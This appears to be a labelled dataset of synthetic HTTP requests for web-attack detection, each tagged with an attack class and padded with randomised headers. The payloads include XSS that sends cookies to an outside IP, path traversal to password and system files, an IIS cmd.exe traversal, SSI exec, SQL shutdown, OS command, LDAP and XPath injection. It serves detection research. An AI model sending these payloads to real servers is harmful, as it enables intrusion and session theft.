Upgrade: odv/3.8, cye8/8.2
Warning: 409 www.nwho7d.jpeg "t6otamehitht" "Sat, 04 Sep 04 24:22:06 CET"
X-Forwarded-For: 177.208.72.84
X-Serial-Number: 698729021
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48023
Start - Id: 47597
class: XSS
GET /hs4rJ5Uwzaieh0ooi/0eitneITttjrnms/s0..shtml?ektnkiosmuoieMa=tbJTkq%40H&l0H3=b5Eqbaa&ogcieo=%3Cobject+classid+++%3D++%22+clsid%3A...++++%22+++codebase+%3D%22++++javascript%3A++%5Bwindow.open%28%27http%3A%2F%2F87.231.253.75%2Foral.nsf%27%2Bdocument.cookie%29%3B%5D+%22%3E&hli97sSAom3enn=noa&open_location@kZmSZhJ=heqs%2FomservicesndoF%25e%24Ci&ra=Jtetibin HTTP/1.1
Host: 141.242.76.158
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: deflate, deflate, deflate;q=0.6, deflate, deflate;q=0.5
Accept-Language: *
Cache-Control: max-age=5
Client-ip: 84.76.139.10
Cookie: rnolxeDlu=0011;TslwneeTlgh3oa=25;f5ynis4i=4954801;elihteOssurrlr=s$eam
Cookie2: $Version="1"
Date: Sat, 11 Nov 06 03:02:49 GMT
ETag: "XH4fCPIuXxAhkkU"
Expect: 100-continue
From: pefnsi@neeUgitin6.gov
If-Modified-Since: Sun, 20 Sep 09 14:01:42 GMT
If-Unmodified-Since: Wed, 14 Oct 09 22:04:16 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 411
MIME-Version: 8.3
Pragma: qshtAhwe=etbcne
Proxy-Authorization: Digest qop=m2ta
Authorization: Digest opaque="oy9ooutw"
Range: 849916-
Referer: /ncazsrl/ph2dsd.rar
TE: chunked,gzip,chunked
Trailer: TE
User-Agent: 2TshRezhsnocio9
UA-CPU: x86
UA-Disp: 672,0345,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0399x875
Via: 7.1 www.eeotc.jpg, s2ei/5.9 www.neo2t.js:4403, FTP/4.4 110.216.0.93
Transfer-Encoding: compress
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 373 www.dtPeNLcw.css "mneticNase4" 
X-Forwarded-For: 28.174.36.198
X-Serial-Number: 2524902769036083814
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47597
Start - Id: 39037
class: LdapInjection
POST /iKNN1CX3S7@/K6Z/gqhSaqcekegfflev/2Ub/neeo6hnn4xiQir6zdsz/DmarsiIni4E/odgaeeno/y5IWy/039xzGEoNrh45/hX/tei13rte/cat_OI_.html? HTTP/1.1
Content-Length: 21
Content-Language: kSh65rA,ulgztry
Content-Encoding: identity
Content-Location: /ssIi.ace
Content-MD5: ZHllYWE1amVrbWxuOXh1Mw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 26 Feb 10 15:36:35 UTC
Last-Modified: Wed, 31 Mar 10 09:14:22 UTC
Host: www.tC0ueedau.fr:203
Connection: keep-alive
Accept: */*
Accept-Charset: gb2312, windows-1250, utf-7, euc-cn;q=0.5
Accept-Encoding: *
Accept-Language: ")(targetfilter=(o=NetscapeRoot))
Cache-Control: no-transform
Client-ip: 71.29.14.198
Cookie: mesvoi=%ep;stnotanaatwns=riianbose1z;zet=23718460;smeaidrE=4>p
Cookie2: $Version="151"
Date: Sun, 09 Sep 07 18:13:30 UTC
ETag: "l2SfdSdZ9GmvmV1."
Expect: iivp=enrRPir;eehum=bo9nia
If-Modified-Since: Tue, 13 Apr 04 04:18:30 UTC
If-Unmodified-Since: Thu, 24 Jun 04 15:22:28 CET
If-Match: *
Max-Forwards: 049
Pragma: nzhe=ee
Authorization: NTLM ZW9hNDRJYXRiYWloZWllZG5hZWVzYXh1aGxoYm9zcm5uZW96cnJ0aA==
Referer: /feAe/eauas6/epsKvq.txt
TE: gzip;q=0.9,chunked;q=0.7,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/5.1 (compatible; MSIE 5.8; Win 9x; lfwhtsa; eA3tToso; sz2mhnit2)
UA-CPU: MIPS
UA-Disp: 720,158,16
UA-Pixels: 247x1587
Via: sel/2.0 www.ngho5aT.gif
Transfer-Encoding: gzip
X-Forwarded-For: 157.105.101.82
X-Serial-Number: 8237003148832
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

e51iytiivim=tgopncnHt

End - Id: 39037
Start - Id: 49864
class: XPathInjection
GET /tQuHM3_aZ9bQ63.A/6ta1edfnitliv1o.jpg?hdafqtll5y=l%2FH%2FuAke%2Fchild%3A%3Anode%28%29%5B++++position%28%29%3D197%5D+++%7C+ohe%2FOee8%2Ftu%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D858%5D+or+%27gSsisi%27%3D+++%27&4glQ7m.ab=88&tnaiadtaen0re=4whLsipsuerf HTTP/1.1
Host: www.dwol.gov:80
Connection: tSnTlpb
Accept: */*;q=0.5
Accept-Charset: iso-10646-ucs-2, x-mac-arabic
Accept-Encoding: identity;q=0.0
Accept-Language: *;q=0.3
Cache-Control: max-age=89
Client-ip: 45.244.106.212
Cookie: a9Rei=shul;diyynwtn1tegoa=i&%
Cookie2: $Version="5"
Date: Sat, 16 Feb 08 07:19:05 GMT
ETag: "xcInQ_66Zglzx9B"
Expect: 100-continue
From: eslc7@67owp.net
If-Modified-Since: Sun, 16 Sep 07 02:49:10 CET
If-Unmodified-Since: Thu, 28 May 09 03:12:12 UTC
If-Match: *
If-None-Match: *
If-Range: "3oI85smExYicW8c7yHH_"
Max-Forwards: 6
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM ZWVqV3N1OWVUYXJxc3puaXFzUmJlaWExZHRldG5maXR4ZTF0ZQ==
Range: 40331-8,658595-,136-
Referer: http://ynen.de/krrnHoN.dll
TE: trailers,trailers,deflate
Trailer: Accept-Encoding
User-Agent: rGyIt08Ve http://www.pnegyVhb.it
UA-CPU: MIPS
UA-Disp: 2831,824,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8115x7637
Via: 5.2 135.250.4.51:62, 1.9 www.dhnth0F.png, HTTP/2.4 www.etsnmah.shtml:9724
Transfer-Encoding: gzip
Upgrade: eht/0.8, T3l/7.9, myt2/5.8
Warning: 988 26.40.140.189 "waoenT" 
X-Forwarded-For: 246.212.130.181
X-Serial-Number: 5095784293385
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49864
Start - Id: 46424
class: PathTransversal
GET /eehl3aeaMzltaaeadyy/e2try8jUPDa4@m-/8style/VpF/jncsh17kwau4/2ktiailhr/cqLecmLT/urd-pb2f9@kLZjEUwCB/rgreSotfgm63za7mdlr.shtml?tK4mochaSd=96&JPPVRnlogZ=%2F%2C%2C%2C%2Fznlatd%2Fest%2Fpasswd HTTP/1.1
Host: www.he5ytet.biz
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: gzip, deflate, identity
Accept-Language: ohs-stnei, fancsd-nn, aso4T-lipy, tef-24ihdh;q=0.5, e-eNrvrAe;q=0.9
Cache-Control: no-store
Client-ip: 124.211.79.221
Cookie: uy=r2vIA;frdth=em;yLVbmmail07=6;c5bzb@httpo7=wdtfIAswonrdsdnace;7hdnsm=je0;@NconnectExBF=KooiaLh
Cookie2: $Version="843"
Date: Mon, 05 Dec 05 07:40:06 GMT
ETag: "IY66ek_V0ngLo.jtW5A"
Expect: rgnRrl
If-Modified-Since: Sat, 08 Apr 06 17:45:11 GMT
If-Unmodified-Since: Tue, 09 Nov 04 14:16:21 GMT
If-Match: "7KS@DlwmcXx@arGlvAuv"
If-None-Match: *
If-Range: "oY.MRtACTt1v6CSmHV"
Max-Forwards: 528
MIME-Version: 3.3
Pragma: pes='Jgt1rt'
Proxy-Authorization: Digest nonce
Authorization: NTLM ZW1laWhUYnNzRTJmZXB3c250aWV3c3NleXd6a2JwOHN3OW9ncw==
Range: 3341-,1-,7-
Referer: /ul62/rocsdte/7wWi/ntelaa.pdf
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/3.6 (X11; U; Linux i586 0.3; hD-h3; rv:0.7.0) Gecko/70262594
UA-CPU: x86
UA-Disp: 5419,5549,32
UA-OS: FreeBSD
Via: 8.9 172.201.127.252, HTTP/7.0 www.hpeas2.tiff, HTTP/4.4 220.13.161.171:94352
Transfer-Encoding: identity
Upgrade: hsrO0/6.6, nTafmr/5.2, s8am/7.7, sIshn/6.2
Warning: 223 232.197.120.51 "npays3" "Wed, 14 Jun 06 02:27:53 UTC"
X-Forwarded-For: 242.103.195.112
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46424
Start - Id: 50018
class: XPathInjection
PUT /ntjtsnko/zKIT/1allm2/oTWtrlaeoar/seua.mspx? HTTP/1.1
Content-Length: 32
Content-Language: e0e,nt4ooH,lM1qh
Content-Encoding: identity
Content-Location: http://10eeheeg.biz/ohmr3/yapov57t.cgi
Content-MD5: emVlRXBxc2d0dHJndGZhdA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 21 Jun 04 21:57:12 GMT
Last-Modified: Sun, 10 May 09 17:17:49 CET
Host: www.fdeeoIh.org:80
Connection: ir4w8tc
Accept: application/postscript, video/*;q=0.7, image/jpeg;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: 1iny'     or  count(path/child::node()[position( )=((i    + j+    k +    l +  1)] |    path/child::*()[position()=(k+1)])=1 or     'uondCt'  =    '   tos'  or
Accept-Language: Alitsesa-elgee3n, tjwssxe-ou4ovie;q=0.3, yqtu-deaKttr;q=0.7, 4-lhIa
Cache-Control: max-age=816
Client-ip: 32.102.243.79
Cookie: tncsfn=slservicesle;nr=47984596;br7yU=80326179;dmabdt=aPx
Cookie2: $Version="72"
Date: Sat, 03 Apr 04 22:28:34 UTC
ETag: "JNImyIsVCIyz3habo"
Expect: A1a1ao=ix1nii;Dh5t
From: helbt@metbhhshe.st
If-Modified-Since: Sun, 09 Jan 05 15:36:24 CET
If-Unmodified-Since: Wed, 27 Jan 10 17:04:27 CET
If-Match: "FwIsv.YKOL06J1pMQ"
If-None-Match: *
If-Range: Mon, 25 Sep 06 09:06:31 GMT
Max-Forwards: 08
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic Y2JlZmZlcXM6aXJUYw==
Authorization: NTLM VXQ3ZjNydEhnRXluNTZjYTN2MHBya25wOG5pbmV1b3dxRXc3ZWQzY29pb3hl
Range: -28912,7700-34
Referer: http://www.sg4SiHa.it/0nee9/relno/aerhffE.rar
TE: trailers,chunked,trailers
Trailer: If-Match
User-Agent: weDl (aT1EzOYBpb)
UA-CPU: 68000
UA-Disp: 5539,6840,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 2146x828
Via: FTP/6.6 www.atollqtt.htm, 2.7 www.sqs2yi.shtml
Transfer-Encoding: gzip
Upgrade: exR/8.9, zdsd/9.0, tOnl/2.3, 6fWla/2.1, ssod/8.7
Warning: 239 www.aeot.png:89227 "aipsiugnfzrrqtm" "Thu, 13 Nov 08 13:14:48 GMT"
X-Forwarded-For: 84.189.52.115
X-Serial-Number: 69751520356030770704
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ohtsneif=>bt&yni=c0vaea0c+ln

End - Id: 50018
Start - Id: 45666
class: PathTransversal
GET /rtqRYQ/xfJK7eBSBDF6K8r/aR_/n8y/di/U6.s@ZwI.1qNFA/sc2r.cfm?cg=hegonsnyne&rteurvd=isesf7usflpoonj&4c8=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&ttTua=aeArfs HTTP/1.0
Host: 186.25.28.64
Connection: h0ne
Accept: text/xml;q=0.2, image/*
Accept-Charset: *;q=0.3
Accept-Encoding: compress
Accept-Language: *;q=0.9
Cache-Control: ht='Ahoeefj'
Client-ip: 10.24.0.201
Cookie: norAllc==7);bIvugw=0593
Cookie2: $Version="46"
Date: Fri, 23 Sep 05 09:44:19 GMT
ETag: W/"tX@AS.xg2TCYBvC8FMx"
Expect: 100-continue
From: waaAi@m8ebbshnen.org
If-Modified-Since: Thu, 25 Aug 05 08:10:44 UTC
If-Unmodified-Since: Sun, 16 Nov 08 16:28:08 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 17 Jul 05 11:20:49 UTC
Max-Forwards: 3
MIME-Version: 2.6
Pragma: ufjsii=stg
Proxy-Authorization: NTLM clNsVHREbnlnaHJuZnRwcnJuaHJzcU9ydHpub3JKTzNydGdyaWRoZjJkajZlU1Rs
Authorization: Digest nc=84437ae2
Range: 1061-92902,515386-
Referer: /8Stali/usayd/punT.ace
TE: gzip;q=0.3
Trailer: User-Agent
User-Agent: Mozilla/8.2 (Machintosh; U; Mac OS X 5.4; n0-l1; rv:6.3.3) Gecko/13930174
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 822x7787
Via: FTP/8.7 www.jhee.tiff, 0.3 www.SsMe.jpeg:9
Transfer-Encoding: deflate
Upgrade: au3/0.3, DRlrd/5.7
Warning: 448 89.102.120.71 "cA0lThi" 
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45666
Start - Id: 45425
class: PathTransversal
PUT /ouottnPniweuethtiebh/moe0lsKgiEal7sq9jttt/weuUmogctsxce/pdQ5Y7/stXmyo5Z.mspx? HTTP/1.0
Content-Length: 123
Content-Language: hHc
Content-Encoding: identity
Content-Location: /oltOo/tla9rsha.wmn
Content-MD5: cnRtaWxoTnNteWRwZWFzeA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 27 Oct 04 12:14:36 CET
Last-Modified: Tue, 15 Nov 05 23:14:13 UTC
Host: 152.196.94.250
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: iso-8859-8-i;q=0.0, koi8-r, windows-1253;q=0.7, windows-1251
Accept-Encoding: gzip
Accept-Language: aah-tql0;q=0.7, khoOaor-ngqv;q=0.8
Cache-Control: max-stale=005
Client-ip: 202.38.83.201
Cookie: 0wnl=hx9d;ao2b=9529913;ext=08tim@X_FHh9;saynhxbetEuors=rZ-08a;meca=evssolahed
Cookie2: $Version="494"
Date: Fri, 09 Dec 05 10:30:30 GMT
ETag: W/"5H2jAbltXSgwgFG-W91"
Expect: 100-continue
From: d1Subs@Oaeelb.fr
If-Modified-Since: Sat, 26 Jul 08 22:50:42 GMT
If-Unmodified-Since: Tue, 23 Mar 10 23:50:25 UTC
If-Match: "UEz5I0Gr9q@D7yhf"
If-None-Match: "U-QKSS5sajU.uE.OSr"
If-Range: "h43ZGVP1a-HOJYZ@eTYM"
Max-Forwards: 9800
MIME-Version: 1.4
Pragma: o1rsU=thle
Proxy-Authorization: Basic bnJlaWUyOnJuYXN4MGFS
Authorization: Basic amR6cnNrcjp0ZXJ0
Range: -292636,082693-
Referer: /aht8Aa.gif
TE: gzip;q=0.5,deflate,trailers
Trailer: Proxy-Authorization
User-Agent: n6elOth/1.5.3
UA-CPU: PowerPC
UA-Disp: 282,5050,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 357x895
Via: 8.5 www.m6dnesI.shtml:4938, 3.8 www.heu3kora.png, 9.3 www.euebVoe.png
Transfer-Encoding: gzip
Upgrade: dtOesl/5.5, bnmms/6.9, ehjAL/3.5, hrt/2.4
Warning: 685 www.notm7.js "acehl3taE" 
X-Forwarded-For: 88.16.159.203
X-Serial-Number: 6520812020
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

odSrtfgofndtcy=t3YKmP&toewddlls4=n&n1otrianEd=834&im7t5e5cinavhMc=../../../../../../../../../usr/yo.bat

End - Id: 45425
Start - Id: 38248
class: LdapInjection
GET /t2Sucj8k6A6.js?utstiowbo2=e&trpet=il+Ow6e%7EWpr&V4ZVevOElinkvKC=cmd3trcfLncMa+ezixhtacces&aaaka=7mqh%29%28%26%28objectClass+%3D+++s6l*%29&eval4ZFpasswd=htsxuireae&otaswtsh=43 HTTP/1.0
Host: 149.86.100.135
Connection: keep-alive
Accept: text/*
Accept-Charset: *;q=0.0
Accept-Encoding: deflate;q=0.9
Accept-Language: *
Cache-Control: ceAdL=tE2
Client-ip: 13.61.176.17
Cookie: twabSkpstetnrc=e&ou
Cookie2: $Version="7"
Date: Wed, 14 Oct 09 10:21:26 CET
ETag: W/"ZCbAaSPE6CHjWiXUBqL5"
Expect: 100-continue
From: sohsfM@gllyl.be
If-Modified-Since: Sun, 01 Apr 07 07:07:28 GMT
If-Unmodified-Since: Sun, 18 Jan 04 24:57:22 GMT
If-Match: "z4_QcN@tiYEE4ab9"
If-None-Match: *
If-Range: "6C1HLBIuBwpGix7hAK"
Max-Forwards: 40
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: hgak4o jyhewio=ntfs
Authorization: cnxnn yrrrjyk=idzrBha
Range: -465,47-4
Referer: http://www.rletprca.uk/dbiwui.pl
TE: trailers,gzip;q=0.0
Trailer: Proxy-Authorization
User-Agent: tSJPriidKs http://www.owfbtt.net
UA-CPU: PowerPC
UA-Disp: 8634,303,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 980x990
Via: FTP/1.4 216.200.228.133, 9.5 29.245.211.226
Transfer-Encoding: gzip
Upgrade: eddcT/3.3, roas/0.6
Warning: 960 www.duToe.shtml "ptStgi2naAcbsign2b" "Wed, 02 Nov 05 20:39:52 UTC"
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 05796287611
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38248
Start - Id: 44043
class: OsCommanding
GET /iisadmpwd/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 11.149.215.213
Connection: epran
Accept: video/mpeg;q=0.0, video/quicktime, text/*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 11.19.174.55
Cookie: 0mtas=29;6nelO2=S;pxl=516;tetr=3653354192
Cookie2: $Version="7"
Date: Wed, 10 Sep 08 18:26:01 CET
ETag: "8UxO4gjUxGz_xq4DjY"
Expect: 100-continue
From: 6aep@Eebnu.org
If-Modified-Since: Sat, 30 May 09 20:22:03 CET
If-Unmodified-Since: Mon, 05 Jan 04 10:20:49 UTC
If-Match: *
If-None-Match: "cvZ-j7azdGPgm9I4"
If-Range: Thu, 01 Dec 05 04:13:54 CET
Max-Forwards: 6936
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: 3kfrae lae59lhs=Se9l
Authorization: Digest qop=auth
Range: 67-764741,470518-20,3-202913
Referer: /0n9v/auawa/AnEyx/thuz/amhtil0.php4
TE: chunked;q=0.6
Trailer: Authorization
User-Agent: slos/7.5
UA-CPU: PowerPC
UA-Disp: 6819,8710,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 695x429
Via: 6.7 151.240.242.79:1499, FTP/5.5 www.enRa.tiff
Transfer-Encoding: gzip
Upgrade: Eaxve/8.7, yk0s/2.8
Warning: 003 www.easrIe.js "dEiywrccwaehsomosn" "Sun, 28 Mar 04 08:37:49 UTC"
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: ------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 44043
Start - Id: 38906
class: LdapInjection
GET /nD4WQwzoL3dU/EazienAilT.gif?9ohqFinclude=70279439&eeoil=brbaai1oasmtteiOst&qmD2=08178&csftiaisk=%29%28+++%7C++%28displayName%3Dhad*%29++%28name+%3D++had*+%29%28++mail%3Dhad*+++%29&pwl=q&1ouhyTua=e6Avs&1is=+%5Dsexect6iFbh%28Ttpns&hrg9ntiua7o=tfdnSedg&XU76_oG=rktnR2b%3Di8ny&YUk6i=enoqan0f HTTP/1.1
Host: www.it5lnUITu.st
Connection: close
Accept: application/postscript;q=0.3, text/plain;q=0.4, video/*;q=0.1
Accept-Charset: cp-936, iso-8859-1, windows-1253
Accept-Encoding: deflate
Accept-Language: LP2Aes-xh;q=0.8, xoalrEe-8iei0e;q=0.5, ert-e;q=0.9
Cache-Control: min-fresh=205
Cookie: TniOtoeca=4DR_B;iJAsadminfFv=59250;i4uow=Txml;noheTIaIaenf=771343971;eoe=8598176227
Date: Sat, 02 May 09 14:44:26 UTC
ETag: "k@slaXcJzeok67W"
Expect: 100-continue
If-Modified-Since: Mon, 27 Feb 06 11:19:12 CET
If-Unmodified-Since: Sat, 21 Mar 09 19:25:31 CET
If-Match: "aAl5EME3QyB0rxU@Vku6"
If-None-Match: *
If-Range: Sat, 31 Jul 04 05:16:18 UTC
Max-Forwards: 2623
MIME-Version: 7.5
Pragma: xt5='3maz'
Proxy-Authorization: 3h2se aosE=ainerp3e
Authorization: 77rz aCeoso2=eaoz
Range: 82450-0782,-876
Referer: http://sgtNii.com/kipnqYa/ktep9i.cfm
TE: trailers,gzip;q=0.2,trailers
Trailer: If-Modified-Since
User-Agent: 0bbtl9osrwchi1lt
UA-OS: Win95
Via: 4.6 www.0ddt.htm
Transfer-Encoding: identity
X-Forwarded-For: 62.216.65.91
X-Serial-Number: 498357729
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38906
Start - Id: 48830
class: XPathInjection
GET /r7raehE/TRirreer1dn/lepNWMi/urof/sIWD/tMKnLEGg18DFaj/ijTCno132R8QRrK.Gxk/TtoxiNghnTl/emtfxpRsrsg/innneoEf6N7/cp2qUqCAR5uoOVxB@Pj.cfm?s54ouy0hot=e%7EwlOarE&iyKzzY7=1a&Kjq@Te7nmX=uo%27+++or+++++7exare%2Fzeo%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D62%5D+++or+%27mrm%27+%3D++++%27&bnaslpyi=le3o&1uyAroout4r6qr=2 HTTP/1.1
Host: www.N3Teeoays.net
Connection: sm2nnn
Accept: video/*;q=0.9, image/gif, audio/*
Accept-Charset: iso-8859-8-i;q=0.6, utf-8, iso-8859-5, x-mac-icelandic, isiri-3342
Accept-Encoding: 
Accept-Language: *
Cache-Control: e=a
Client-ip: 237.125.11.120
Cookie: rLR7hsAlt=m6anr(
Cookie2: $Version="352"
Date: Sun, 11 Feb 07 21:44:16 GMT
ETag: W/"Eot2OfllQboCmLby61Ro"
Expect: 100-continue
From: 18kll@eaes.it
If-Modified-Since: Sat, 10 Jul 04 03:34:30 GMT
If-Unmodified-Since: Fri, 05 Jan 07 09:06:05 CET
If-Match: *
If-None-Match: ".CZTX74b-JQ2cwlAI"
If-Range: "a94BlaFi9D5pQ4_"
Max-Forwards: 8
MIME-Version: 5.3
Pragma: bT6icen=ztmib
Proxy-Authorization: NTLM bmVpVHByZTAwRm5lZWNvZWIwc2hyU2pzQW5wZmV0cmVzZW9yZWFlZ2FPZXIw
Authorization: mozwE tpuHu=of2keub
Range: 5920-3
Referer: http://qroAtrne.com/ahtwo/to0ee0/urzko/Adnts/ugbT.html
TE: chunked;q=0.8
Trailer: Referer
User-Agent: tctOTGer (spMQ2B5UI; hAs-OCrlh; c8.XR1kS)
UA-CPU: StrongARM
UA-Disp: 6889,429,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0867x2824
Via: 8.9 www.otraoau.jpeg:42
Transfer-Encoding: gzip
Upgrade: qdiue/5.0
Warning: 056 www.f4xe1oNm.htm "ehiaia" "Mon, 17 Nov 08 12:21:14 CET"
X-Forwarded-For: 54.250.164.51
X-Serial-Number: 6969445752998
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48830
Start - Id: 42731
class: SqlInjection
POST /utb/tO/pGKCk.Uw/5gWP/lO7mKK.jqrdWuEAu/sy7eTraExutSsaoeatse/sletaal.css? HTTP/1.1
Content-Length: 145
Content-Language: 6tqrM8xm,txvs7ria,ttslnyz
Content-Encoding: gzip
Content-Location: /fLhis/ntign8en.exe
Content-MD5: ZGV2dHRTZXVlU25lc2hiaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 08 Dec 04 15:41:38 CET
Last-Modified: Thu, 10 Dec 09 15:52:40 CET
Host: 241.47.175.100
Connection: keep-alive
Accept: image/png;q=0.6
Accept-Charset: x-mac-korean;q=0.0, x-mac-japanese;q=0.4, windows-1252;q=0.9, iso-8859-4;q=0.5, euc-cn
Accept-Encoding: *
Accept-Language: ';   shutdown--
Cache-Control: only-if-cached
Client-ip: 58.18.176.200
Cookie: ye=nus;ts5aedjlteObt=2Ugk;Arhthegwtehh=fncee;iler2ilnEa=rntry@hy~binhthn1wgs;gJ1euXeH7iwinnt=<is3
Cookie2: $Version="80"
Date: Wed, 05 Jul 06 15:52:17 CET
ETag: "NbMe7oZgcJBmRk8"
Expect: 100-continue
From: 6ueuo@oyblbl9dec.biz
If-Modified-Since: Thu, 10 Jul 08 03:39:51 UTC
If-Unmodified-Since: Wed, 06 Jan 10 18:21:13 UTC
If-Match: "18xD6p2WGyDJSCPX"
If-None-Match: "CgHj.-oAvd03O.luiTT"
Max-Forwards: 6974
Proxy-Authorization: Digest nc=53EA578F
Authorization: Basic ZTdlaGM6ZXN1Zw==
Range: 05899-13921,10727-12714,2996-
Referer: /nnea/tvrt2eer.bin
TE: deflate;q=0.5,chunked;q=0.2,trailers
User-Agent: Mozilla/6.7 (X11; U; Open BSD i586 9.9; 6t-nr; rv:4.8.8) Gecko/64294655
UA-OS: Win98
UA-Color: color32
Via: 3.2 www.rcfoa.html
Transfer-Encoding: identity
Warning: 061 www.szapau.png "yf3tew" 
X-Forwarded-For: 61.170.12.182

yeeEhhtmra=S zn%ei&ulr=1860518&iotEeoirM=e2CWqnN&perhew0oigo=254781&neoEoeaertfdfi=valllu&3he=S6+allog6itnph-&WH3EUx3d=987&aPr5cNemorpc2a=137

End - Id: 42731
Start - Id: 40205
class: SSI
PUT /uJ0ge2e98l/.pwf/so/mAaeeET7vorfeoO7/Umetat7ZazBiN3/tssOzFQ/eictnaedx6eltarSeaXn/Z_Z/3u5CDeoWWJ/9h97RneliMogta/nihod3spcsnecE/arnvcmm.jsp? HTTP/1.1
Content-Length: 13
Content-Language: Ai,occ
Content-Encoding: deflate
Content-Location: /adE3HbeT/yainlhin.swf
Content-MD5: eWRlazh0d2lPbGRmZGF3YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 05 Jul 04 19:41:23 GMT
Last-Modified: Wed, 21 Jan 04 15:31:51 CET
Host: www.snwdar974.st
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: <!     #<!--   #exec     cmd="id"-->
Cache-Control: no-store
Client-ip: 88.227.11.41
Cookie2: $Version="379"
Date: Fri, 20 Jul 07 06:10:36 GMT
ETag: "80tscXTxV1vorSOB"
Expect: rawtes
If-Match: "Z3Ls1DD-vkGj0mBX4"
If-None-Match: *
If-Range: Fri, 02 Dec 05 16:46:13 UTC
Pragma: no-cache
Authorization: NTLM UzQ4b2VvcWVyc2Vnb2t0ck5yaW9udG90dG1obmVUbkVycmE4c2lNbA==
Range: -503,356-,-44225
Referer: http://www.psea4.gov/ame2ehrp/sa4lT/dn6oo/jreJ.gif
User-Agent: Mozilla/5.3 (compatible; Konqueror/1.9; Unix; naopn; eduI; eheE0wl)
Transfer-Encoding: identity

avoc1WCzA=roo

End - Id: 40205
Start - Id: 36732
class: OsCommanding
GET /sRyBpZIyFG-/I.@2P4script3cl8.mspx?NVfgov=s%29sfm&etau=08&XaRlYJnADexecBd=19&hEaehr=%27++%3Bps++++-aux++%3B&jio3ItatItte=141 HTTP/1.0
Host: 157.44.113.52
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: gzip, gzip;q=0.5, identity
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 103.144.20.186
Cookie: MdUY7Zgc7e=dKs;enn=tSDb
Cookie2: $Version="7"
Date: Wed, 21 Apr 10 07:51:46 UTC
ETag: "FaWmKnGLIj3GuDEP9"
Expect: 100-continue
From: uehzS@rs1ylsy5.ch
If-Modified-Since: Sat, 26 Aug 06 19:08:23 GMT
If-Unmodified-Since: Sat, 07 Aug 04 18:17:07 UTC
If-Match: "7.FLD_rMMQLXTAnYw"
If-None-Match: *
If-Range: Tue, 22 Dec 09 09:36:33 GMT
Max-Forwards: 883
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: it0a ison5ofO=srsyk
Authorization: arbdmm d5imtsen=htu1tR
Range: -47510,582-0
Referer: http://www.fooefs.com/R4dbn/aaMhob/stqe/hirwpHoc/Ererina.png
TE: gzip,trailers,deflate
Trailer: Cache-Control
User-Agent: irno/2.8.5.6
UA-CPU: Sparc
UA-Disp: 8267,5613,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 402x4966
Via: HTTP/5.1 www.exeEe.html
Transfer-Encoding: compress
Warning: 156 39.92.206.178 "handies1bawt" 
X-Forwarded-For: 246.253.133.9
X-Serial-Number: 5966336
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36732
Start - Id: 44643
class: PathTransversal
GET /i5M9jzPNnR6E3.asp? HTTP/1.1
Host: 67.116.126.20
Connection: keep-alive
Accept: */*;q=0.2
